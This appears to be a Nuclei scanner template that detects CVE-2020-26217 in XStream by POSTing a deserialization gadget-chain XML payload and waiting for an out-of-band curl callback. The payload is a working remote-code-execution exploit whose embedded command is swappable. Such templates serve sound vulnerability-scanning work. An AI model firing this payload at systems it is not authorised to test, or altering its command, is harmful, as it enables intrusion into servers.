# Nuclei template: confirms CVE-2020-26217 (XStream < 1.4.14) by sending one
# XStream XML payload and waiting for an out-of-band HTTP callback.
id: CVE-2020-26217

info:
  name: XStream < 1.4.14 - Remote Code Execution
  author: pwnhxl
  severity: high
  description: |
    XStream before version 1.4.14 is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream. Only users who rely on blocklists are affected.
  reference:
    - https://x-stream.github.io/CVE-2020-26217.html
    - https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a
    - https://github.com/x-stream/xstream/security/advisories/GHSA-mw36-7c6c-q4q2
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-26217
    cwe-id: CWE-78
  # "oast" marks this template as dependent on an interactsh server: without
  # out-of-band connectivity from the target it can never produce a match.
  tags: cve,cve2020,xstream,deserialization,rce,oast

requests:
  # A single POST to the root path. Applications that accept XStream input on
  # a different endpoint are not covered by this template.
  # The body is the XStream XML payload from the referenced advisory; the only
  # command it embeds is a curl to the interactsh callback URL, sent with a
  # random User-Agent so the callback can be attributed to this request.
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <map>
          <entry>
            <jdk.nashorn.internal.objects.NativeString>
              <flags>0</flags>
              <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
                <dataHandler>
                  <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
                    <contentType>text/plain</contentType>
                    <is class='java.io.SequenceInputStream'>
                      <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
                        <iterator class='javax.imageio.spi.FilterIterator'>
                          <iter class='java.util.ArrayList$Itr'>
                            <cursor>0</cursor>
                            <lastRet>-1</lastRet>
                            <expectedModCount>1</expectedModCount>
                            <outer-class>
                              <java.lang.ProcessBuilder>
                                <command>
                                  <string>curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'</string>
                                </command>
                              </java.lang.ProcessBuilder>
                            </outer-class>
                          </iter>
                          <filter class='javax.imageio.ImageIO$ContainsFilter'>
                            <method>
                              <class>java.lang.ProcessBuilder</class>
                              <name>start</name>
                              <parameter-types/>
                            </method>
                            <name>start</name>
                          </filter>
                          <next/>
                        </iterator>
                        <type>KEYS</type>
                      </e>
                      <in class='java.io.ByteArrayInputStream'>
                        <buf></buf>
                        <pos>0</pos>
                        <mark>0</mark>
                        <count>0</count>
                      </in>
                    </is>
                    <consumed>false</consumed>
                  </dataSource>
                  <transferFlavors/>
                </dataHandler>
                <dataLen>0</dataLen>
              </value>
            </jdk.nashorn.internal.objects.NativeString>
            <string>test</string>
          </entry>
        </map>

    # Both matchers must hit. An HTTP interaction alone is not accepted; the
    # callback must also carry the User-Agent string sent in the payload
    # (nuclei is relied on to substitute the same rand_base value in both
    # places — confirm against the engine version in use), which ties the
    # interaction to this request rather than to unrelated traffic.
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{rand_base(6)}}"